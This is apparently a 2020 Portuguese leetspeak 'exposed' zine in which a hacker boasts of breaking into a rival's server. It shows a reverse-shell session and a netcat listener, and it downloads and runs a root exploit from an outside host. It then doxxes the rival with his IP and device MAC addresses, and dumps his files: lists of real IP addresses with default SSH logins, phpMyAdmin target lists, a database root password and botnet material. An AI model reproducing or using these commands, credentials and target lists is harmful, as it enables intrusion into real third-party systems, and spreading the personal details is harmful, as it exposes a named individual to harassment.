File size: 30,767 Bytes
8ecd256
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631

/**********************************************************************************************
* 0B5: p4r4 f4z3r um 3xp053d d3 um h4x0r d3 t4l n1v3l					      *
*      t3m03 qu3 n05 1gu4l4r 3 ut1l1z4r um4 35cr1t4 l337 d0 m35m0 n1v3l (r1505)		      *
*      											      *
*											      *
* 3xp053d wr1tt3n P4RT 1 by uNfz @ irc.efNet.org / irc.Gigachat.org 2020.		      *
*                   	      |          ___________                                          *
* 		              |         |           |					      *
* 		              T4RG3T----| HaxStr0ke |					      *
*                                       |___________| https://twitter.com/HaxStroke 	      *
* 											      *
*  B0m 4qu1 35t0u h0j3 d1r3t4m3nt3 v1nd0 d0 "35g0t0 d4 1nt3rn3t" (t3rm0 u54d0 p4r4 d35cr3v3r  *
*  n0554 0r1g3m d0 1RC) p0r n0550 qu3r1d1551m0 4m1g0 P53ud0 H4CK3R "r00x" m415 c0nh3c1d0      *
*  c0m0 "HaxStr0k3" 0u k1ng 0f dd05!!! (H4H4H4)					              *
*  p4r4 0rgulh054m3ntr3 (qu3r d1z3r v3rg0nh054m3nt3 p015 0qu3 53r4 m05tr4d0 n p4554 d3 l1x0)  *
*  3xp0r 4 gr4nd3 f4rç4 qu3 3l3 3.          						      *
*  1r31 t4mb3m d15p0n1b1l1z4r 0 50urce d3 5u4 gr4nd3 cr14ç40 (r1pp4g3m)		      *
*  qu3 n0m30u d3 "MILNET" ou Military Net, um4 35p3c13 de M1R41 c0m b4nn3r d1f3r3nt3. (r1505) *
* 											      *
*  B0m d1t0 1550 v4m05 4 pwn4g3m!!!							      *
* 											      *
***********************************************************************************************/



#include <c4p1tul0.1>	/* 0 m35tr3 d05 d15f4rc35 3 53u 1P d3 c454 */
#include <c4p1tul0.2>	/* R0d4nd0 0 l337 4t4qu3		   */
#include <c4p1tul0.3>	/* 05 4rqu1v05 d3 um h4ck3r		   */
#include <c4p1tul0.4>	/* b0nu5				   */
#include <c4p1tul0.5>	/* C0n51d3r4ç035 f1n415		   */


/* -------------------------------------------- c4p1tul0.1 -------------------------------------------  /
|													|
|				0 m35tr3 d05 d15f4rc35 3 53u 1P d3 c454					|
|													|
/  ---------------------------------------------------------------------------------------------------  /
/  huM c0n53g1r 53u r34l 1P d3 4c3550 n40 f0i um4 d45 t4r3f45 m415 d1f1c315 um4 v3z qu3 0 m35m0         |
|  ult1l1z4 5u4 pr0pr14 c0n3x40 d3 c454 l1mp4 53m p4554r p0r qu4lqu3r t1p0 d3 0bfu5c4d0r, 0u um 	| 
|  51mpl35 pr0xy p4r4 1nv4d1r 53rv1d0r35 4l34t0r105 53m qu4lqu3r cr1t3r10 53m c0n53gu1r 0bt3r 		|
|  pr1v1l3g105 r00t 0 qu3 t1r4 qu4lqu3r p0551b1l1d4d3 d3 4p4g4r 05 r45tr05 m415 1d10t45 p0551v315 qu3   |
|  3l3 d31x4.						                                                |
|  D3 t0d4 f0rm4 3 b3m f4c1l d35c0br1r 0nd3 pr0cur4r j4 qu3 0 m35m0 c0rr3 p4r4 f4z3r p05t4g3n5 h4x0r5   |
|  3m 53u tw1tt3r l0g0 qu3 0wn4 4lg0, tw1tt3r 35t3 ch310 d3 p355045 qu3 4cr3d1t4m n45 5u45              | 
|  GR4ND35 h4b1l1d4d35 H4H4H4	       								       */


[~]# grep "zakrytye" /var/log/apache2/access.log|head -n1
191.19.23.155 - - [15/Mai/2020:18:14:31 -0300] "GET /zakrytye.html HTTP/1.1" 200  <------ IP HaxStr0ke

/* H4H4 f4c1lm3nt3 3nc0ntr4d0 3m qu4lqu3r w3b53rv3r qu3 ele p4554     / 
|  b0m 4g0r4 1r31 pul4r t0d4 4 p4rt3 ch4t4 3 d3m0r4d4 d45 t3nt4t1v45  |
/  4t3 45 v145 d3 f4t0! H4H4                                         */



/* -------------------------------------------- c4p1tul0.2 -------------------------------------------- /
|													|
|				        r0d4nd0 0 l337 4t4qu3 h4h4 					|
|													|
/ ---------------------------------------------------------------------------------------------------- */

sec:~# ./rstack -w -r191.19.23.155:8088 -l200.20.50.2:80 -x5

Oh yEaH!!
look at me as i penetrate 
your server seductively!
...
...
...    8=D ~~~~~ 

Enjoy your shell!!

b33r:~# nc -lvvn 80
Listening on [0.0.0.0] (family 0, port 80)
Connection from [191.19.23.155] port 80 [tcp/ *] accepted (family 2, sport 35884) 
sh-4.2$ echo "0h y34h pwn3d"
0h y34h pwn3d

/* H0H0H0 MU1T0 B0M! PWN3D!		 				                   /
|  											   /
|  4cr3d1t3m 0u n40 3l3 t3m um 53rv1d0r c4541r0 l1g4d0 24h ap3n45 pr4 d31x4r r0d4nd0 5c4n  /
|  d3 phpmy4dm1n, t0mc4t e brut3f0rc3 de w0rdpr355 e I0T c0m 53u pr0pr10 1P d3 c454        /
|  b451c4m3nt3 05 c0nh3c1m3nt05 d3l3 53 l1m1t4m 4p3n45 4h 3553 t1p0 d3 4t4qu35.		   /

sh-4.2$ uname -a;id 
Linux nationalserver 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
uid=48(apache) gid=48(apache) grupos=48(apache)
sh-4.2$ cat /etc/*release*|head -n1
CentOS Linux release 7.7.1908 (Core)

/* huN m45 t3m 4lg0 qu3 35t4 m3 1nc0m0d4nd0.. v4m05 d4r um j31t0 n1550!  */

sh-4.2$ cd /tmp;lynx --source 200.20.50.2:7977/dec/COS >> COS
sh-4.2$ chmod +x COS;./COS --lptd=7
.....................
..............
fuck the banner, 
we just want r00t
.........
.....................
g0t r00t!?

sh-4.2# id
uid=0(root) gid=0(root) grupos=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0

/* Y34H !!!! :D */

sh-4.2# awk 'BEGIN {system("/bin/bash")}'

[root@nationalserver ~]# echo "fud3u pr4 v0c3 4m1g0 :)"
fud3u pr4 v0c3 4m1g0 :)




/* -------------------------------------------- c4p1tul0.3 -------------------------------------------- /
|													|
|				        05 4rqu1v05 d3 um h4ck3r 					|
|													|
/ ---------------------------------------------------------------------------------------------------- */

/* 4qu1 c0m3ç4 4 d1v3r540 b0m v4m05 v3r 0qu3 3l3 t3m */

[root@nationalserver ~]# ls -hal
total 7,6M
dr-xr-x---. 25 root root 4,0K Mai 20 19:50 .
dr-xr-xr-x. 18 root root  257 Fev 17 02:29 ..
-rw-r--r--.  1 root root 2,1K Nov  4  2019 1.py
drwxr-xr-x.  3 root root   45 Abr 14 12:32 amp
drwxrwxrwx.  7 root root  123 Out  1  2019 arquivos
-rw-r--r--.  1 root root 3,9K Out 28  2019 backs
-rw-------.  1 root root  12K Nov  9  2019 .bash_history
-rw-r--r--.  1 root root   18 Dez 29  2013 .bash_logout
-rw-r--r--.  1 root root  176 Dez 29  2013 .bash_profile
-rw-r--r--.  1 root root  771 Fev 10 15:52 .bashrc
-rw-r--r--.  1 root root 1,5K Abr 23 14:52 blackhat.pl
dr-xr-xr-x.  2 root root 4,0K Fev 17 01:36 bot
drwxr-xr-x.  4 root root   35 Out 14  2019 botnet		<------ m4qu1n45 3 sc4n d3 phpmy4dm1n CV3 d3 m1l 4n0s 4tr4s H4H4 
-rw-r--r--.  1 root root 4,3K Mar  5 12:49 build_payload.py
-rw-r--r--.  1 root root 8,4K Fev 13 13:39 build.sh
drwxr-xr-x.  4 root root   33 Jun 21  2019 .cache
-rw-r--r--.  1 root root  114 Abr 14 15:34 cmd.php		<------ l33t0 phpsh3ll
-rwxr-xr-x.  1 root root 7,0M Mai  7 18:40 cnc
drwxr-xr-x.  6 root root   95 Abr 13  2019 .cpan
drwxr-xr-x.  3 root root   50 Abr  2 23:03 crack
-rw-r--r--.  1 root root  100 Dez 29  2013 .cshrc
-rw-r--r--.  1 root root  62K Abr 14 15:33 dk.php
-rwxr-xr-x.  1 root root  185 Abr 16 19:52 dns-updater
-rw-r--r--.  1 root root 114K Abr  2 12:07 don.txt
-rwxr-xr-x.  1 root root  13K Nov  4  2019 enc
-rw-r--r--.  1 root root 2,5K Jan 17  2018 enc.c
drwxr-xr-x.  3 root root   47 Ago  8  2019 .exploits
-rw-r--r--.  1 root root   94 Ago  8  2019 .gitconfig
drwxrwxrwx.  4 root root   28 Set 17  2019 go
drwxr-xr-x. 16 root root 4,0K Abr  8 15:15 hashcat
drwx------.  4 root root   37 Abr  8 17:01 .hashcat
drwxr-xr-x.  6 root root  145 Fev 17 01:34 kkk
drwxrwxrwx.  4 root root   73 Mar  5 12:47 loader
-rw-r--r--.  1 root root  68K Out 14  2019 milnet.zip	     <------ milnet s0urc3 (m1r41 3d1t4d0)
-rwxr-xr-x.  1 root root   34 Fev 13 14:43 monitora_bots      <------ um 1ncr1v3l c0d1g0, tail -f
drwxr-xr-x.  9 root root  114 Ago  8  2019 .msf4		  <------- g4rg4lh4d45
-rw-------.  1 root root  189 Mai 20 19:50 .mysql_history
-rw-r--r--.  1 root root  331 Abr 14 15:34 ok.php
-rw-r--r--.  1 root root  410 Jan 30 02:37 ok.sh
-rw-r--r--.  1 root root  226 Abr 10 12:23 passfile.txt  <------- l33t0z p4$$w0rd5 12345 123123 admin h4h4!!
drwxrwxrwx.  5 root root   39 Ago 11  2019 perl5
drwxr-----.  3 root root   19 Abr  4  2019 .pki
-rw-r--r--.  1 root root 2,1K Nov  4  2019 pp.py
drwxr-xr-x.  3 root root   19 Nov  4  2019 Projects
-rw-r--r--.  1 root root 8,9K Abr 10 12:20 proto_wp2.py    <----- Brut3/Sc4nn3r cms (w0rdpr355) p0r ./Cryptonking (B4l0x)
drwxrwxrwx.  7 root root  218 Ago  8  2019 ptf
-rw-------.  1 root root   12 Ago  2  2019 .python_history
drwxr-xr-x.  3 root root   39 Abr 23 13:38 qbot
-rwxr-xr-x.  1 root root   48 Fev 10 10:20 run
drwxr-xr-x.  2 root root   80 Abr 13 13:18 scanner	  <------ t00l p4r4 sub1r 0s b0ts d4 milnet
-rwxrwxrwx.  1 root root 233K Mai  9  2019 screenfetch-dev
-rw-r--r--.  1 root root  675 Ago  8  2019 .searchsploit_rc
drwxr-xr-x.  4 root root   35 Mai 23  2019 .sqlmap	<-------- ...t1p1c0
drwx------.  2 root root   25 Abr 21  2019 .ssh
-rw-r--r--.  1 root root  129 Dez 29  2013 .tcshrc
-rw-r--r--.  1 root root  27K Abr 23 14:22 vuln.txt   <------- um m0nt3 d3 l1x0 qu3 n func10n4 iot's -> admin:admin root:root bl4 bl4 bl4
drwxrwxrwx.  2 root root   76 Abr 10 16:57 wordpress  <---- l33t0 brut3f0rc3 d3 w0rpr3ss/j00ml4 by ProtoWave h4h4

/* 4ch0 qu3 1550 v41 s3r d4s4n1m4d0r 3l3 j3 n40 m3 p4r3c3 m415 t40 h4x0r 3l337  */

[root@nationalserver ~]# wc -l vuln.txt;head vuln.txt
999 vuln.txt
ec2-user:ec2-user:172.105.54.39
ec2-user:ec2-user:172.104.60.88
ec2-user:ec2-user:172.105.73.195
ec2-user:ec2-user:172.104.98.170
ec2-user:ec2-user:172.105.199.228
test:test:129.146.195.163
oracle:oracle:152.67.108.192
root:root:140.238.176.162
test:test:130.61.54.205
test:test:129.146.84.214


/* 4 p4rt1r d4qu1 d31x4r31 05 c0m3nt4r105 p0r c0nt4 d3 qu3m 35t4 l3nd0			|
|  j4 t0 c4n54d0 d3 r1 t4 d03nd0 0 35t0m4g0.					       */


[root@nationalserver ~]# cd arquivos; ls -lah
total 4,2M
drwxrwxrwx.  7 root root  123 Out  1  2019 .
dr-xr-x---. 25 root root 4,0K Mai 20 19:50 ..
drwxrwxrwx.  9 root root 4,0K Dez  6 14:31 backup
-rwxrwxrwx.  1 root root 3,1M Out  1  2019 back.zip
drwxrwxrwx.  2 root root  217 Mar  8 11:32 bots
-rwxrwxrwx.  1 root root 951K Jun 26  2019 bots.zip
drwxrwxrwx.  4 root root  120 Ago  8  2019 katoolin
-rwxrwxrwx.  1 root root  62K Abr 17  2019 speedtest.py
drwxrwxrwx.  3 root root 4,0K Mai 18 22:14 tsm
drwxrwxrwx. 12 root root 4,0K Mar 22 15:08 xpls

[root@nationalserver arquivos]# ls -lah xpls
total 3,0M
drwxrwxrwx. 12 root root 4,0K Mar 22 15:08 .
drwxrwxrwx.  7 root root  123 Out  1  2019 ..
-rwxrwxrwx.  1 root root 2,1K Ago  8  2019 COMMITMENT
drwxrwxrwx.  8 root root   77 Ago  8  2019 data
drwxrwxrwx.  3 root root  133 Ago  8  2019 doc
drwxrwxrwx. 11 root root  163 Ago  8  2019 extra
-rwxrwxrwx.  1 root root  275 Ago  8  2019 .gitattributes
drwxrwxrwx.  3 root root   77 Ago  8  2019 .github
-rwxrwxrwx.  1 root root   77 Ago  8  2019 .gitignore
-rwxrwxrwx.  1 root root    0 Set 26  2019 jexboss_2019-09-26.log
drwxrwxrwx.  5 root root 4,0K Out  2  2019 jexboss-master
-rw-r--r--.  1 root root 216K Dez 15 15:57 k.txt
drwxrwxrwx.  9 root root  130 Ago  8  2019 lib
-rwxrwxrwx.  1 root root  19K Ago  8  2019 LICENSE
-rwxrwxrwx.  1 root root 668K Ago 15  2019 lncc.txt
-rwxrwxrwx.  1 root root 1,9M Ago  8  2019 master.zip
-rwxrwxrwx.  1 root root  92K Set  2  2019 master.zip.1
-rwxrwxrwx.  1 root root  12K Ago 15  2019 o.txt
drwxrwxrwx.  4 root root   52 Ago  8  2019 plugins
-rwxrwxrwx.  1 root root  17K Ago  8  2019 .pylintrc
-rwxrwxrwx.  1 root root 4,8K Ago  8  2019 README.md
-rwxrwxrwx.  1 root root 2,9K Ago  8  2019 sqlmapapi.py
-rwxrwxrwx.  1 root root  21K Ago  8  2019 sqlmap.conf
-rwxrwxrwx.  1 root root  17K Ago  8  2019 sqlmap.py
drwxrwxrwx.  2 root root 4,0K Ago  8  2019 tamper
drwxrwxrwx. 22 root root 4,0K Ago  8  2019 thirdparty
-rwxrwxrwx.  1 root root  235 Ago  8  2019 .travis.yml
drwxrwxrwx.  3 root root   46 Set  2  2019 unis

[root@nationalserver arquivos]# ls -lah bots
total 8,9M
drwxrwxrwx. 2 root root  217 Mar  8 11:32 .
drwxrwxrwx. 7 root root  123 Out  1  2019 ..
-rwxrwxrwx. 1 root root   99 Nov 24  2013 beta.sh
-rwxrwxrwx. 1 root root    0 Nov  1  2014 bios.txt
-rwxrwxrwx. 1 root root   37 Nov 24  2013 boss
-rwxrwxrwx. 1 root root  137 Nov 16  2013 cgi
-rwxrwxrwx. 1 root root   69 Nov 18  2013 .dsf
-rwxrwxrwx. 1 root root 1,8K Mar  5  2016 install.sh
-rwxrwxrwx. 1 root root  15K Mai 24  2016 pl.php
-rw-r--r--. 1 root root  82K Mar  8 11:32 rdp.txt	
-rwxrwxrwx. 1 root root 7,8M Mar 20 14:44 .session.log
-rwxrwxrwx. 1 root root 234K Set 22  2013 ss
-rwxrwxrwx. 1 root root  230 Jun 30  2014 update
-rwxrwxrwx. 1 root root 720K Jun 12  2016 vuln2.txt
-rwxrwxrwx. 1 root root  911 Jun 28  2019 vuln.txt
-rwxrwxrwx. 1 root root 5,4K Mar 20 14:40 x
-rwxrwxrwx. 1 root root  13K Nov 15  2013 zmeu

[root@nationalserver arquivos]# head bots/rdp.txt bots/vuln.txt
==> bots/rdp.txt <==
http://51.178.27.97/phpMyAdmin/scripts/setup.php
http://46.18.208.85/phpMyAdmin/scripts/setup.php
http://51.255.168.59/phpMyAdmin/scripts/setup.php
http://51.178.27.97/phpmyadmin/scripts/setup.php
http://46.17.67.155/phpmyadmin/scripts/setup.php
http://82.64.138.208/phpmyadmin/scripts/setup.php
http://46.18.208.85/phpmyadmin/scripts/setup.php
http://51.255.168.59/phpmyadmin/scripts/setup.php
http://13.231.106.145/phpMyAdmin/scripts/setup.php
http://201.143.146.178/phpMyAdmin/scripts/setup.php

==> bots/vuln.txt <==
http://172.96.165.78/phpmyadmin/scripts/setup.php
http://185.242.161.156/phpmyadmin/scripts/setup.php
http://61.231.155.125/phpMyAdmin/scripts/setup.php
http://39.109.127.229/phpmyadmin/scripts/setup.php
http://61.49.10.208/phpMyAdmin/scripts/setup.php
http://103.218.3.199/phpMyAdmin/scripts/setup.php
http://154.92.16.153/phpmyadmin/scripts/setup.php
http://211.21.154.65/phpMyAdmin/scripts/setup.php
http://61.8.76.214/phpMyAdmin/scripts/setup.php
http://103.40.150.228/phpmyadmin/scripts/setup.php

[root@nationalserver arquivos]# wc -l bots/vul* bots/rdp*
 13378 bots/vuln2.txt
    18 bots/vuln.txt
  1691 bots/rdp.txt
 15087 total

[root@nationalserver arquivos]# ls -hal tsm
total 104M
drwxrwxrwx. 3 root root 4,0K Mai 18 22:14 .
drwxrwxrwx. 7 root root  123 Out  1  2019 ..
-rw-r--r--. 1 root root  18M Jan  9 11:55 amazon.txt
-rw-r--r--. 1 root root 5,1M Abr 20 14:48 br.txt
-rwxrwxrwx. 1 root root  162 Mai  7  2019 copy
-rwxrwxrwx. 1 1316 1316   24 Abr 17  2019 dir2.dir
-rwxrwxrwx. 1 1316 1316   24 Abr 17  2019 dir.dir
-rwxrwxrwx. 1 root root   41 Mai  7  2019 go
-rw-r--r--. 1 root root 1,6K Nov  8  2019 index.html
-rw-r--r--. 1 root root 1,8K Nov 11  2019 k.txt
-rw-r--r--. 1 root root  24M Mar 15 16:51 k.zip
drwxrwxrwx. 4 1316 1316   26 Abr 12  2019 lib
-rwxrwxrwx. 1 1316 1316    2 Abr 17  2019 n
-rw-r--r--. 1 root root 2,2K Mai  7 09:55 okv
-rwxrwxrwx. 1 root root 1,4K Set 18  2019 ovhm
-rw-r--r--. 1 root root 7,8M Mai 18 14:18 ovh.txt
-rwxrwxrwx. 1 root root   21 Ago 17  2019 ownada
-rw-r--r--. 1 root root 3,4K Mai 18 22:41 p
-rwxrwxrwx. 1 root root 4,2K Set  9  2019 p3
-rwxrwxrwx. 1 root root  837 Set 18  2019 password
-rw-r--r--. 1 root root  199 Mai 18 21:55 scan.log
-rwxrwxrwx. 1 1316 1316  995 Abr 10  2019 stop
-rwxrwxrwx. 1 root root   82 Set  3  2019 sup
-rw-r--r--. 1 root root 1,3M Abr 21 00:10 sure.txt
-rw-r--r--. 1 root root 1,4M Mai  5 13:35 torun.txt
-rwxrwxrwx. 1 1316 1316  309 Abr 10  2019 tsm
-rwxrwxrwx. 1 1316 1316 1,9M Abr 13  2019 tsm32
-rwxrwxrwx. 1 1316 1316 3,1M Abr 13  2019 tsm64
-rwxrwxrwx. 1 root root  10M Abr 18  2019 tsm.tar
-rw-r--r--. 1 root root  45K Mai 10 19:25 uf.txt
-rw-r--r--. 1 root root 114K Mai 18 21:03 univer.txt
-rw-r--r--. 1 root root  451 Mai 18 21:30 v
-rw-r--r--. 1 root root  659 Mai 11 22:43 v1
-rw-r--r--. 1 root root  21K Mai 18 22:01 wordlist.txt
-rwxrwxrwx. 1 root root  16M Set 13  2019 xaa
-rwxrwxrwx. 1 root root  16M Set 13  2019 xab
-rwxrwxrwx. 1 root root  20K Set 13  2019 xac

[root@nationalserver arquivos]# head tsm/ovhm
head tsm/ovhm
ec2-user:ec2-user:34.220.190.177:UNCHANGED:22:Linux:x86_64:SSH-2.0-OpenSSH_7.4:Intel(R) Xeon(R) CPU E5-2686 v4 @:7819 1628 4369 64 1821 5830:2-->1
ec2-user:ec2-user:13.58.181.15:UNCHANGED:22:Linux:x86_64:SSH-2.0-OpenSSH_7.4:Intel(R) Xeon(R) CPU E5-2676 v3 @:985 463 522 0 78 255:1-->1
ubuntu:ubuntu:18.221.249.6:UNCHANGED:22:Linux:x86_64:SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8:Intel(R) Xeon(R) CPU E5-2676 v3 @:990 225 156 12 608 550:1-->1
ubuntu:ubuntu:3.15.19.229:UNCHANGED:22:Linux:x86_64:SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8:Intel(R) Xeon(R) CPU E5-2676 v3 @:990 77 141 11 772 689:1-->1
vsftp:vsftp:142.4.207.155:UNCHANGED:22:Linux:x86_64:SSH-2.0-OpenSSH_7.2p2 Ubuntu-4:Intel(R) Core(TM) i7-7700K CPU @ 4.20GHz:2000 1038 736 26 225 864:1-->7
git:git:51.68.126.44:UNCHANGED:22:Linux:x86_64:SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3:Intel Core Processor (Haswell, no TSX):1952 566 96 33 1289 1165:1-->25
root:proxmox:54.36.186.24:UNCHANGED:22:Linux:x86_64:SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6:Common KVM processor   :2004 158 1237 40 608 1662:2-->37
root:root12345:54.38.225.67:UNCHANGED:22:Linux:x86_64:SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3:Intel(R) Xeon(R) CPU E5-1630 v4 @:1993 245 1264 6 484 1590:1-->42
root:password:51.83.41.15:UNCHANGED:22:Linux:x86_64:SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8:Intel Core Processor (Haswell, no TSX):1952 1173 106 46 672 548:1-->47


[root@nationalserver ~]# w
 11:55:55 up 96 days,  9:27,  1 user,  load average: 0,13, 0,10, 0,07
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/4    192.168.15.12    11:55    3.00s  0.03s  0.01s mysql -p

/*  haxstr0ke 0nl1n3 :D m4s...
    0 d3u5 d0 dd05 l337 n f4z 1d314 d0q t4 4c0nt3c3nd0... */





/* -------------------------------------------- c4p1tul0.4 -------------------------------------------  /
|													|
|					   C0n51d3r4ç035 f1n415						|
|													|
/  ---------------------------------------------------------------------------------------------------  /


  3xpl3nd1d0!! pl3n0 2020 3 b451c4m3nt3 o Haxstr0ke 5e r35um3 3m brut3 f0rc3 d3 iot's c0m 53nh4 p4dr40,
  phpmy4dm1n c0m bug m415 v3lh0 q 0 0rkut, brut3 f0rc3 d3 w0rdpr355, 3xpl0r4r t0mc4t c0m j3xb055 (0ld)
  3 0 qu3r1d1nh0 d3 t0d05 5qlm4p!
  3 3u n3m v0u c1t4r 4 p4rt3 0nd3 3l3 d31x4 45 m4qu1n45 0wn4d45 ch3145 d3 l0g d3 c0m4nd05, p0r 51n4l
  c0m4nd05 b3m atr4p4lh4d05 (r1505) 0 qu3 d3m0n5tr4 n t3r 4 m1n1m4 1d314 d0q 35t4 f4z3nd0.
  (f1c4 pr4 p4rt 2 qu3m 54b3.)

  F4r31 4 p4rt3 2 l0g0 m415 3xp0nd0 53u5 4rqu1v05 d0 c0mput4d0r p35504l c0m 53u5 0utr05 4c35505 3 d0 53u 
  c3lul4r qu3 tbm 3 ut1l1z4d0 p4r4 4c3554r 53u 5up3r 53rv3r 0wn4d0r c4531r0
  qu3 p0r 51n4l 5u4 c4m3r4 fr0nt4l f01 muit0 ut1l :)

  IP PC: 192.168.15.12
  MAC Address: E0:69:95:56:77:3D (Pegatron)

  IP mobile: 192.168.15.13
  MAC Address: 34:BB:26:8D:6A:5E (Motorola Mobility)

						               


  b0m c0m0 p0d3m05 v3r h4 p0uqu1551m0 c0nh3c1m3nt0 p4r4 t4nt4 4rr0g4nc14            
  53j4 m415 hum1ld3 vc n40 3 4b50lut4m3nt3 ngm n p4554 d3 um 53r 4b41x0 d0 m3d14n0 :) 




  Se voce que esta lendo isso é um desses pseudos hackers eleet "famosinho" de twitter e discord 
  que ficou magoado com algo que foi dito aqui, tenta a sorte e venha aqui no "esgoto da internet" trocar 
  uma ideia pra vc ver o que te acontece tbm :) */



/* -------------------------------------------- c4p1tul0.5 -------------------------------------------  /
|													|
|				        	  B0nu5		 					|
|													|
|  				   05 u5u4r105 d4 5u4 b1g b0tn3t 3xp05t05				| ------------------------------------------------------------------------------------------------------ */


[root@nationalserver ~]# mysql -hlocalhost -uroot -p
mysql -hlocalhost -uroot -p
Enter password: bringmethehorizon

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 13363
Server version: 5.5.64-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| milnet             |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)

MariaDB [(none)]> use milnet;
use milnet;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [milnet]> show tables;
show tables;
+------------------+
| Tables_in_milnet |
+------------------+
| history          |
| users            |
| whitelist        |
+------------------+
3 rows in set (0.00 sec)

MariaDB [milnet]> select * from users;
select * from users;
+----+---------------+-------------------+----------------+----------+------+------------+----------+-------+-------+---------+
